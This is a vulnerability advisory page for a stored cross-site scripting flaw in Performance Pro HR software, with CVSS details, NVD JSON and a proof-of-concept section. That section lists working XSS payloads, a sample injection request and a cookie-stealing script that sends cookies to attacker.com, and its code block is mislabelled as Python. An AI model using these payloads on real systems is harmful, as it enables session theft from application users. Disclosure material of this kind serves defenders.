Security Vulnerability Report
中文
CVE-2025-60934 CVSS 6.1 MEDIUM

CVE-2025-60934

Published: 2025-10-21 15:15:40
Last Modified: 2026-04-15 00:35:42

Description

Multiple stored cross-site scripting (XSS) vulnerabilities in the index.php component of HR Performance Solutions Performance Pro v3.19.17 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee Notes, title, or description parameters. The patched version is PP-Release-6.3.2.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HR Performance Solutions Performance Pro < PP-Release-6.3.2.0
HR Performance Solutions Performance Pro v3.19.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60934 PoC - Stored XSS in HR Performance Solutions Performance Pro --> <!-- Vulnerable parameters: Employee Notes, title, description --> <!-- Example 1: Inject via Employee Notes parameter --> <script>alert('XSS-Via-EmployeeNotes')</script> <!-- Example 2: Inject via title parameter --> <img src=x onerror=alert(document.cookie)> <!-- Example 3: Inject via description parameter --> <svg onload=alert('XSS-Via-Description')> <!-- HTTP Request Example (conceptual) --> <!-- POST /index.php HTTP/1.1 Host: target-performance-pro.com Content-Type: application/x-www-form-urlencoded employee_notes=<script>alert('Stored-XSS')</script>&title=<img src=x onerror=alert(1)>&description=<svg onload=alert(1)> --> <!-- Cookie Stealing Payload Example --> <!-- <script>document.location='http://attacker.com/steal?c='+document.cookie</script> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60934", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:39.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in the index.php component of HR Performance Solutions Performance Pro v3.19.17 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee Notes, title, or description parameters. The patched version is PP-Release-6.3.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://docs.offsecguy.com/cve/hr-performance-solutions/vulnerability/reflected-xss-employee-notes", "source": "[email protected]"}]}}